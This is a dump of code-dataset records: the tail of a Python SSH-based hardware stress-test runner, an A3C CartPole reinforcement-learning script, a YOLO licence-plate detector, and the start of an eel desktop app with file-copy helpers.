e:\r\n\t\tprint(\"Connection timed out\")\r\n\t\tresult_flag = False\r\n\texcept Exception as e:\r\n\t\tprint(\"Exception in connecting to the server\")\r\n\t\tprint(\"PYTHON SAYS:\",e)\r\n\t\tresult_flag = False\r\n\t\tssh.close()\r\n\telse:\r\n\t\tresult_flag = True\r\n\r\n\t# get number of tests and setup log folder\r\n\tdf = pd.read_csv(CSV_PATH,encoding='cp1252')\r\n\tcombination = df['combination'][test_num-1]\r\n\tfolder = df['folder'][test_num-1]\r\n\tcommand_line = df['command_line'][test_num-1]\r\n\tindex = df['testnumber'][test_num-1]\r\n\trun_status = df['runstatus'][test_num-1]\r\n\r\n\tif result_flag:\r\n\t\tif run_status != \"#\":\r\n\t\t\tlogPath = os.path.join(BASE_PATH, 'logs', 'Combination' + str(combination))\r\n\t\t\tos.chdir(logPath)\r\n\t\t\tlogFile = 'Test' + str(test_num) + \".log\"\r\n\t\t\tif MODE == \"dmesg\":\r\n\t\t\t\twhile q.empty():\r\n\t\t\t\t\tstdin, stdout, stderr = ssh.exec_command('dmesg -wT',get_pty=True)\r\n\t\t\t\t\twith open('dmesg.log','a') as o:\r\n\t\t\t\t\t\torig_stdout = sys.stdout\r\n\t\t\t\t\t\tsys.stdout = o\r\n\t\t\t\t\t\tfor line in iter(stdout.readline,\"\"):\r\n\t\t\t\t\t\t\tprint(line.strip('\\n'))\r\n\t\t\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\t\t\to.close()\r\n\t\t\telse:\r\n\t\t\t\tcount = 1\r\n\t\t\t\twhile q.empty():\r\n\t\t\t\t\ttimestamp = str(datetime.now())\r\n\t\t\t\t\tresult = \"TEST STARTED\"\r\n\t\t\t\t\tprint(\"Combination: %s Test number: %s Time: %s Command: %s Iteration: %s Status: %s\" % (combination,test_num,timestamp,command_line,count,result))\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tif folder.find('binocle') != -1:\r\n\t\t\t\t\t\t\tstdin, stdout, stderr = ssh.exec_command('export UseDrmVirtualEnginesForCcs=0; cd {0};{1}'.format(folder, command_line), timeout=900, get_pty=True)\r\n\t\t\t\t\t\telif folder.find('OpenCV') != -1:\r\n\t\t\t\t\t\t\tstdin, stdout, stderr = ssh.exec_command('cd {0}; export LD_LIBRARY_PATH=$PWD; {1}'.format(folder, command_line), timeout=900, get_pty=True)\r\n\t\t\t\t\t\telif folder.find('HCPBench') != -1:\r\n\t\t\t\t\t\t\tstdin, stdout, stderr = ssh.exec_command('cd {0}; cd ../HCPBenchSYCLlib; export LD_LIBRARY_PATH=$PWD; cd {1}; {2}'.format(folder, folder, command_line), timeout=900, get_pty = True)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tstdin, stdout, stderr = ssh.exec_command('cd {0};{1}'.format(folder, command_line), timeout=900, get_pty=True)\r\n\t\t\t\t\t\tcopy_to_excel(\"TEST_RESULT,\" + str(combination) + \",\" + str(test_num) + \",\" + timestamp + \",\" + folder + \",\" + command_line + \",\" + str(count) + \",\" + result + \"\")\r\n\t\t\t\t\t\twith open(logFile, 'a') as o:\r\n\t\t\t\t\t\t\torig_stdout = sys.stdout\r\n\t\t\t\t\t\t\tsys.stdout = o\r\n\t\t\t\t\t\t\tfor line in iter(stdout.readline,\"\"):\r\n\t\t\t\t\t\t\t\tprint(line.strip('\\n'))\r\n\t\t\t\t\t\t\tvalue = stdout.channel.recv_exit_status()\r\n\t\t\t\t\t\t\tif value != 0:\r\n\t\t\t\t\t\t\t\tresult = \"TEST FAILED\"\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tresult = \"TEST PASSED\"\r\n\t\t\t\t\t\t\tprint(\"Combination: %s Test number: %s Time: %s Command: %s Iteration: %s Status: %s\" % (combination,test_num,timestamp,command_line,count,result))\r\n\t\t\t\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\t\t\t\to.close()\r\n\t\t\t\t\t\t\ttimestamp = str(datetime.now())\r\n\t\t\t\t\t\t\tprint(\"Combination: %s Test number: %s Time: %s Command: %s Iteration: %s Status: %s\" % (combination,test_num,timestamp,command_line,count,result))\r\n\t\t\t\t\t\t\tcopy_to_excel(\"TEST_RESULT,\" + str(combination) + \",\" + str(test_num) + \",\" + timestamp + \",\" + folder + \",\" + command_line + \",\" + str(count) + \",\" + result + \"\")\r\n\t\t\t\t\texcept socket.timeout as e:\r\n\t\t\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\t\t\tprint(\"Connection timed out\")\r\n\t\t\t\t\t\tos._exit(1)\r\n\t\t\t\t\texcept PipeTimeout:\r\n\t\t\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\t\t\tprint(\"Connection timed out\")\r\n\t\t\t\t\t\tos._exit(1)\r\n\t\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\t\t\tprint(\"Exception in execute command\")\r\n\t\t\t\t\t\tprint(\"PYTHON SAYS:\", e)\r\n\t\t\t\t\t\tos._exit(1)\r\n\t\t\t\t\tcount += 1\r\n\tos._exit(1)\r\n\r\ndef run():\r\n\tglobal comb_from\r\n\tglobal comb_to\r\n\targs = [target,user,password,totalTime]\r\n\tprocesses = []\r\n\r\n\treset()\r\n\t\r\n\tlist = pd.read_csv(CSV_PATH,encoding='cp1252')\r\n\trows = len(list.index)\r\n\ttestsAvailable = int(rows/6)\r\n\r\n\tq = multiprocessing.Queue()\r\n\r\n\tif (comb_to >= comb_from) and (comb_to <= testsAvailable):\r\n\t\twhile comb_from <= comb_to:\r\n\t\t\ttest_num = comb_from*6 - 5\r\n\t\t\ttest_to = comb_from*6\r\n\t\t\t#cleanup combination logs\r\n\t\t\tlogPath = os.path.join(BASE_PATH, 'logs', 'Combination' + str(comb_from))\r\n\t\t\tif os.path.exists(logPath):\r\n\t\t\t\tshutil.rmtree(logPath)\r\n\r\n\t\t\tos.makedirs(logPath)\r\n\t\t\tos.chdir(logPath)\r\n\t\t\tcreate_resultsCsv()\r\n\r\n\t\t\tfor i in range(test_num,test_to+1):\r\n\t\t\t\tstartTest = multiprocessing.Process(target=runTests,args=(q,i,args))\r\n\t\t\t\tstartTest.start()\r\n\t\t\t\tprocesses.append(startTest)\r\n\r\n\t\t\t#MODE = \"dmesg\"\r\n\t\t\t#startLog = multiprocessing.Process(target=runTests, args=(q, test_num, args, MODE))\r\n\t\t\t#startLog.start()\r\n\r\n\t\t\tstartTimer = multiprocessing.Process(target=runTimer,args=(q,args))\r\n\t\t\tstartTimer.start()\r\n\r\n\t\t\t#startLog.join()\r\n\t\t\tfor startTest in processes:\r\n\t\t\t\tstartTest.join()\r\n\t\t\tstartTimer.join()\r\n\r\n\t\t\t# check if the IP is reachable\r\n\t\t\tstatus = checkTarget()\r\n\t\t\tif status != 0:\r\n\t\t\t\tlogging(comb_from)\r\n\t\t\t\treset()\r\n\t\t\t\r\n\t\t\tprint(\"Waiting for 5 mins before taking logs\")\r\n\t\t\ttime.sleep(300)\r\n\t\t\tlogging(comb_from)\r\n\r\n\t\t\t#terminate\r\n\t\t\t#startLog.terminate()\r\n\t\t\tstartTimer.terminate()\r\n\t\t\tfor startTest in processes:\r\n\t\t\t\tstartTest.terminate()\r\n\t\t\treset()\r\n\t\t\tcomb_from +=1\r\n\r\n\t\t\t#clear queue\r\n\t\t\twhile not q.empty():\r\n\t\t\t\tq.get()\r\n\telse:\r\n\t\tprint(\"Please check test combinations in config.ini file\")\r\n\r\nif __name__ == \"__main__\":\r\n\t# instantiate\r\n\tconfig = ConfigParser()\r\n\r\n\t# parse existing file\r\n\tconfig.read('config.ini')\r\n\r\n\t# read contents of config.ini\r\n\tdict = {}\r\n\r\n\tfor sec in config.sections():\r\n\t\tfor item in config.items(sec):\r\n\t\t\tdict[item[0]] = item[1]\r\n\r\n\t# read values from a section\r\n\ttarget = config.get('SYSTEM-INFO', 'target')\r\n\tuser = config.get('SYSTEM-INFO', 'user')\r\n\tproject = config.get('SYSTEM-INFO', 'project')\r\n\thours = config.getint('TEST-PARAMS', 'hour')\r\n\tminutes = config.getint('TEST-PARAMS', 'minute')\r\n\tcomb_from = config.getint('TEST-PARAMS', 'comb_from')\r\n\tcomb_to = config.getint('TEST-PARAMS', 'comb_to')\r\n\tboot = dict.get('boot').strip('\\n')\r\n\tpost_boot = dict.get('post_boot').strip('\\n')\r\n\tpost_driver = dict.get('post_driver').strip('\\n')\r\n\r\n\tprint(\"Target:\", target)\r\n\tprint(\"User:\", user)\r\n\tprint(\"Project:\", project)\r\n\tprint(\"Hours:\", hours)\r\n\tprint(\"Minutes:\", minutes)\r\n\tprint(\"Test from:\", comb_from)\r\n\tprint(\"Test to:\", comb_to)\r\n\r\n\tinput = input(\"Is this configuration OK to proceed (Y/N)?\")\r\n\r\n\tif input == \"Y\" or input == \"y\":\r\n\t\tprint(\"Configuration is OK to proceed. Continuing.\")\r\n\telse:\r\n\t\tprint(\"Invalid input. Please try again!\")\r\n\t\tsys.exit(1)\r\n\r\n\t##calculate timeout in seconds\r\n\ttotalTime = (hours * 3600) + (minutes * 60)\r\n\r\n\tpassword = getpass(prompt='Input your target password: ')\r\n\r\n\t# TODO: read from config\r\n\tPYSV_PROJECT = 'pontevecchio'\r\n\tPYSV_REPO = fr\"C:\\pythonsv\\{PYSV_PROJECT}\"\r\n\tsys.path.append(PYSV_REPO)\r\n\tos.chdir(PYSV_REPO)\r\n\tfrom startpvc import *\r\n\tfrom common import baseaccess\r\n\r\n\tif baseaccess.getaccess() != 'tssa':\r\n\t\timport itpii\r\n\r\n\t\titp = itpii.baseaccess()\r\n\r\n\titp.unlock()\r\n\r\n\timport startpvc_auto\r\n\r\n\tstartpvc_auto.auto_main()\r\n\r\n\trun()\r\n\tsys.exit(0)\r\n", "repo_name": "sandeep-stack/my_data", "sub_path": "stressRun.py", "file_name": "stressRun.py", "file_ext": "py", "file_size_in_byte": 14330, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 30, "usage_type": "call"}, {"api_name": "pontevecchio.debug.domains.gfx.gt.gtStatus.status", "line_number": 44, "usage_type": "call"}, {"api_name": "pontevecchio.debug.domains.gfx.gt.gtStatus", "line_number": 44, "usage_type": "name"}, {"api_name": "pontevecchio.fv.ras.error_logging_modules.soc_error_log.soc_error_log", "line_number": 48, "usage_type": "call"}, {"api_name": "pontevecchio.fv.ras.error_logging_modules.soc_error_log", "line_number": 48, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "pontevecchio.debug.domains.gfx.tools.scandump.pvcgfxscanAFD.gtScandump", "line_number": 56, "usage_type": "call"}, {"api_name": "pontevecchio.debug.domains.gfx.tools.scandump.pvcgfxscanAFD", "line_number": 56, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 57, "usage_type": "call"}, {"api_name": "os.system", "line_number": 64, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 70, "usage_type": "call"}, {"api_name": "toolext.bootscript.boot.clean_up_vars", "line_number": 78, "usage_type": "call"}, {"api_name": "toolext.bootscript.boot", "line_number": 78, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 93, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "paramiko.SSHClient", "line_number": 106, "usage_type": "call"}, {"api_name": "paramiko.AutoAddPolicy", "line_number": 107, "usage_type": "call"}, {"api_name": "paramiko.AuthenticationException", "line_number": 109, "usage_type": "attribute"}, {"api_name": "paramiko.SSHException", "line_number": 112, "usage_type": "attribute"}, {"api_name": "socket.timeout", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 134, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 152, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 153, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 156, "usage_type": "attribute"}, {"api_name": "os._exit", "line_number": 159, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 167, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 169, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 180, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path", "line_number": 187, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 188, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 192, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 204, "usage_type": "call"}, {"api_name": "paramiko.SSHClient", "line_number": 215, "usage_type": "call"}, {"api_name": "paramiko.AutoAddPolicy", "line_number": 216, "usage_type": "call"}, {"api_name": "paramiko.AuthenticationException", "line_number": 218, "usage_type": "attribute"}, {"api_name": "paramiko.SSHException", "line_number": 221, "usage_type": "attribute"}, {"api_name": "socket.timeout", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path", "line_number": 245, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 246, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 252, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 253, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 256, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 261, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 261, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 275, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 276, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 285, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 287, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 287, "usage_type": "name"}, {"api_name": "socket.timeout", "line_number": 290, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 291, "usage_type": "attribute"}, {"api_name": "os._exit", "line_number": 293, "usage_type": "call"}, {"api_name": "paramiko.buffered_pipe.PipeTimeout", "line_number": 294, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 295, "usage_type": "attribute"}, {"api_name": "os._exit", "line_number": 297, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 299, "usage_type": "attribute"}, {"api_name": "os._exit", "line_number": 302, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 304, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 314, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path", "line_number": 325, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 326, "usage_type": "call"}, {"api_name": "os.path", "line_number": 326, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 327, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 329, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 330, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 334, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 342, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 357, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 376, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 414, "usage_type": "call"}, {"api_name": "getpass.getpass", "line_number": 419, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 424, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 424, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 425, "usage_type": "call"}, {"api_name": "common.baseaccess.getaccess", "line_number": 429, "usage_type": "call"}, {"api_name": "common.baseaccess", "line_number": 429, "usage_type": "name"}, {"api_name": "itpii.baseaccess", "line_number": 432, "usage_type": "call"}, {"api_name": "startpvc_auto.auto_main", "line_number": 438, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 441, "usage_type": "call"}]} +{"seq_id": "111041884", "text": "import torch\nfrom torch import nn\nfrom torch import optim\nimport numpy as np\nfrom torch.nn import functional as F\nimport gym\nimport torch.multiprocessing as mp\n\n\nclass ActorCritic(nn.Module):\n def __init__(self):\n super(ActorCritic, self).__init__()\n self.l1 = nn.Linear(4,25)\n self.l2 = nn.Linear(25,50)\n self.actor_lin1 = nn.Linear(50,2)\n self.l3 = nn.Linear(50,25)\n self.critic_lin1 = nn.Linear(25,1)\n def forward(self,x):\n x = F.normalize(x,dim=0)\n y = F.relu(self.l1(x))\n y = F.relu(self.l2(y))\n actor = F.log_softmax(self.actor_lin1(y),dim=0) # Returns log probs over the two actions\n c = F.relu(self.l3(y.detach()))\n critic = torch.tanh(self.critic_lin1(c)) # Returns values between -1 and 1\n return actor, critic\n \n\ndef worker(t, worker_model, counter, params):\n worker_env = gym.make(\"CartPole-v1\")\n worker_env.reset()\n worker_opt = optim.Adam(lr=1e-4,params=worker_model.parameters()) # Each worker has own environment and optimizer\n worker_opt.zero_grad()\n for i in range(params['epochs']):\n worker_opt.zero_grad()\n values, logprobs, rewards = run_episode(worker_env,worker_model) #B plays one episode\n actor_loss,critic_loss, eplen = update_params(worker_opt,values,logprobs,rewards) # Use collected data to run one update step\n counter.value = counter.value + 1 # Globally shared counter\n\n\ndef run_episode(worker_env, worker_model):\n state = torch.from_numpy(worker_env.env.state).float() # Converts state to tensor\n values, logprobs, rewards = [], [], []\n done = False\n j=0\n while not done:\n j+=1\n policy, value = worker_model(state) # Computes state value and log probs over actions\n values.append(value)\n logits = policy.view(-1) # Flattens\n action_dist = torch.distributions.Categorical(logits=logits)\n action = action_dist.sample() # Samples from action probability distribution\n logprob_ = policy.view(-1)[action]\n logprobs.append(logprob_)\n state_, _, done, _ = worker_env.step(action.detach().numpy())\n state = torch.from_numpy(state_).float()\n if done:\n reward = -10\n worker_env.reset()\n else:\n reward = 1.0\n rewards.append(reward)\n return values, logprobs, rewards\n\n\ndef update_params(worker_opt,values,logprobs,rewards,clc=0.1,gamma=0.95):\n rewards = torch.Tensor(rewards).flip(dims=(0,)).view(-1) # Reverse and flatten\n logprobs = torch.stack(logprobs).flip(dims=(0,)).view(-1)\n values = torch.stack(values).flip(dims=(0,)).view(-1)\n Returns = []\n ret_ = torch.Tensor([0])\n for r in range(rewards.shape[0]): # Compute return values\n ret_ = rewards[r] + gamma * ret_\n Returns.append(ret_)\n Returns = torch.stack(Returns).view(-1)\n Returns = F.normalize(Returns,dim=0)\n actor_loss = -1*logprobs * (Returns - values.detach()) # Prevent backprop through critic head\n critic_loss = torch.pow(values - Returns,2)\n loss = actor_loss.sum() + clc*critic_loss.sum() # sum both losses to get overall loss. scale critic loss to ensure critic learns slower\n loss.backward()\n worker_opt.step()\n return actor_loss, critic_loss, len(rewards)\n\n\nif __name__ == '__main__':\n MasterNode = ActorCritic() # Shared AC model\n MasterNode.share_memory() # Allows params to be shared accross processes\n processes = []\n params = {\n 'epochs':1000,\n 'n_workers':7,\n }\n\n counter = mp.Value('i',0) # Shared global counter\n for i in range(params['n_workers']):\n p = mp.Process(target=worker, args=(i,MasterNode,counter,params)) # Starts new process that runs a worker\n p.start() \n processes.append(p)\n for p in processes: # Joins each process to wait for it to finish before returning to main function\n p.join()\n for p in processes:\n p.terminate()\n \n print(counter.value,processes[1].exitcode)\n\n # eval\n env = gym.make(\"CartPole-v1\")\n env.reset()\n\n for i in range(100):\n state_ = np.array(env.env.state)\n state = torch.from_numpy(state_).float()\n logits,value = MasterNode(state)\n action_dist = torch.distributions.Categorical(logits=logits)\n action = action_dist.sample()\n state2, reward, done, info = env.step(action.detach().numpy())\n if done:\n print(\"Lost\")\n env.reset()\n state_ = np.array(env.env.state)\n state = torch.from_numpy(state_).float()\n env.render()", "repo_name": "unit0113/projects", "sub_path": "ML/RL/cart_pole_mc_ac.py", "file_name": "cart_pole_mc_ac.py", "file_ext": "py", "file_size_in_byte": 4651, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.tanh", "line_number": 24, "usage_type": "call"}, {"api_name": "gym.make", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.distributions.Categorical", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.pow", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.multiprocessing.Value", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.multiprocessing.Process", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 95, "usage_type": "name"}, {"api_name": "gym.make", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.distributions.Categorical", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "74288694564", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport main\n\n\n# In[2]:\n\n\nnet = cv2.dnn.readNetFromDarknet(\"yolov3_custom.cfg\", r\"yolov3_custom_2000.weights\")\n\n\n# In[3]:\n\n\ndef show(img):\n print(img.shape)\n plt.imshow(img)\n plt.show()\n\n\n# In[4]:\n\n\nclasses = ['licence']\n\n\n# In[5]:\n\n\n#img = cv2.imread('image4.jpg')\n\n\n# In[7]:\n\n\ndef locateLP(img):\n hight,width,_ = img.shape\n\n blob = cv2.dnn.blobFromImage(img, 1/255,(416,416),(0,0,0),swapRB = True,crop= False)\n net.setInput(blob)\n output_layers_name = net.getUnconnectedOutLayersNames()\n\n layerOutputs = net.forward(output_layers_name)\n\n\n boxes =[]\n confidences = []\n class_ids = []\n\n for output in layerOutputs:\n for detection in output:\n score = detection[5:]\n class_id = np.argmax(score)\n confidence = score[class_id]\n if confidence > 0.5:\n #print(confidence)\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * hight)\n w = int(detection[2] * width)\n h = int(detection[3] * hight)\n x = int(center_x - w/2)\n y = int(center_y - h/2)\n boxes.append([x, y, w, h])\n confidences.append((float(confidence)))\n class_ids.append(class_id)\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, .8, .4)\n #print(indexes)\n ans = []\n #detectedimg = img.copy()\n #font = cv2.FONT_HERSHEY_PLAIN\n if len(indexes)>0:\n for i in indexes.flatten():\n # x,y,w,h = boxes[i]\n ans.append(boxes[i])\n # label = str(classes[class_ids[i]])\n # confidence = str(round(confidences[i],2))\n # color = (255,255,255)\n # cv2.rectangle(detectedimg,(x,y),(x+w,y+h),color,10)\n # cv2.putText(detectedimg,label + \" \" + confidence, (x,y+400),font,2,color,2)\n # show(detectedimg)\n \n ans = np.array(ans)\n return ans\n\n\ndef final_img_and_number(img):\n ans = locateLP(img)\n\n PlateNumber = []\n new = img.copy()\n for i in ans:\n x, y, w, h = i\n #x, y, w, h = ans[0][0], ans[0][1], ans[0][2], ans[0][3]\n cv2.rectangle(new, (x, y), (x + w, y + h), (255, 255, 255), 5)\n #number, segments = main.PlateRecognition(img[y:y + h, x:x + w])\n #FinalImage.append(new)\n #PlateNumber.append(number)\n\n return new #, PlateNumber\n\n\nif __name__ == '__main__':\n img = cv2.imread('ps2/ps2/test_multipleCar/p3.png')\n ans, PlateNumber = final_img_and_number(img)\n show(ans)\n for i in PlateNumber:\n print(i)", "repo_name": "shriyanshibhadada/-license-plate-recognizer", "sub_path": "DetectPlates.py", "file_name": "DetectPlates.py", "file_ext": "py", "file_size_in_byte": 2693, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.dnn.readNetFromDarknet", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "cv2.dnn.blobFromImage", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.dnn.NMSBoxes", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 110, "usage_type": "call"}]} +{"seq_id": "8923621679", "text": "import random, os, shutil, json\n\n#Package install if necessary\nprint(\"Checking packages...\")\nwith open('package.json', 'r') as f:\n packages = json.load(f)\n for (k,v) in packages.items():\n if v == False:\n print(f'{k} may not be installed. Downloading it to your system. Installer: pip')\n os.system(f'pip install {k}')\n packages[k] = True\n\nwith open('package.json', 'w') as f:\n json.dump(packages, f, indent=2)\n\nimport wx\nimport eel\nimport requests\n\neel.init(\"web\") #Initialise front end files from web dir\nDESKTOP_PATH = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')\n\n#Clear images folder by deleting full tree followed by mkdir\nif os.path.exists('web/images'):\n shutil.rmtree('web/images')\n\nos.mkdir('web/images')\n\n#Clear stylesheet from previous build if somehow exists\nif os.path.exists('./style.css'):\n os.remove('./style.css')\n\ndef copytree(src, dst, symlinks=False, ignore=None):\n \"\"\"\n Generously inspired by StackOverflow as shutil.copytree doesn't really work.\n Copy file contents from src to dst, both str path inputs\n \"\"\"\n for item in os.listdir(src):\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if os.path.isdir(s):\n shutil.copytree(s, d, symlinks, ignore)\n else:\n shutil.copy2(s, d)\n\n@eel.expose\ndef findImagePath(wildcard=\"*\"):\n \"\"\"\n Opens a file dialog to select an image from user's file system, copies the image to the web/images dir and returns that path.\n No inputs, but optional to change wildcard input (default *).\n \"\"\"\n\n app = wx.App(None) #Necessary to open filedialog!!\n style = wx.FD_OPEN | wx.FD_FILE_MUST_EXIST\n dialog = wx.FileDialog(None, 'Open', wildcard=wildcard, style=style) #File dialog window\n if dialog.ShowModal() == 